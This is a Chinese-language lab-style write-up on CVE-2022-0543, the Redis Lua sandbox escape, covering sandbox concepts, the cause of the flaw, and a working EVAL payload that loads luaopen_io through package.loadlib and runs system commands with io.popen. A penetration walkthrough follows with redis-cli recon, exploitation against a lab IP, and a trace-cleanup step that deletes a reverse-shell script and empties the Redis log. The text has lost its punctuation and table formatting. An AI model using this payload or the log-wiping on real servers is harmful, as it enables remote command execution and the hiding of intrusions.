Redis沙盒逃逸(CVE-2022-0543) 一.沙箱的含义沙箱是一种安全机制限制程序只能访问特定资源防止恶意操作影响系统。场景沙箱作用浏览器沙箱网页代码只能操作浏览器无法直接读写本地文件游戏沙箱外挂程序无法修改游戏内存Redis Lua 沙箱Lua 脚本无法执行系统命令、访问文件系统关系图物理机├── 容器 ADocker│ └── Redis 进程│ └── Lua 沙箱 ←── 你的漏洞在这层突破│ └── 恶意脚本理论上只能操作 Redis│└── 容器 B其他应用1.什么是redisRedis英文全称是Remote Dictionary Server远程字典服务是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库并提供多种语言的API。与MySQL数据库不同的是Redis的数据是存在内存中的。它的读写速度非常快每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存另外Redis也经常用来做分布式锁。除此之外Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。2.春秋这里可以进行ssrf跳转到baidu页面直接使用file://协议进行读取flag3.漏洞复现漏洞原理该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量该变量又允许访问任意 Lua 功能。我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linugnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数即可获得io库再使用其执行命令Redis 5.0.7 的 Lua 沙箱├── 禁用了 io/os 等危险库loadlib 被限制└── 但漏洞package.loadlib() 仍可加载外部动态库攻击路径package.loadlib() → 加载系统 liblua5.1.so → 导出 luaopen_io→ 获得 io.popen() → 执行任意系统命令复现payload:eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0代码片段作用local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io)加载系统 Lua 库获取luaopen_io函数沙箱禁用的危险函数local io io_l()调用函数初始化 IO 模块获得io.popen等危险方法local f io.popen(id, r)执行系统命令id返回文件句柄local res f:read(*a)读取命令全部输出f:close()关闭文件句柄return res将结果返回给 Redis 客户端0声明脚本操作 0 个 Redis 键绕过键名检查修改红色部分就可以执行命令了eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(whoami); local res f:read(*a); f:close(); return res 0关键风险点要素说明无需认证Redis 未设置密码或已认证远程 RCE网络可达即可执行系统命令服务权限通常以redis用户运行但可尝试提权隐蔽性利用 Lua 脚本不写入磁盘二.实战渗透1.信息收集# 确认目标存在且版本 vulnerable redis-cli -h 192.168.40.128 -p 6379 INFO server | grep redis_version # 期望5.0.7 或 5.0.6 等 5.0.8 的版本2.验证漏洞存在redis-cli -h 192.168.40.128 -p 6379 EVAL return test 0 # 确保 EVAL 命令可用Lua 引擎正常3.漏洞利用redis-cli -h 192.168.40.128 -p 6379 EVAL local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 04.清理痕迹# 删除临时文件 EVAL ... io.popen(rm -f /tmp/reverse.sh) ... 0 # 清空 Redis 日志如有权限 EVAL ... io.popen(echo /var/log/redis/redis-server.log 2/dev/null) ..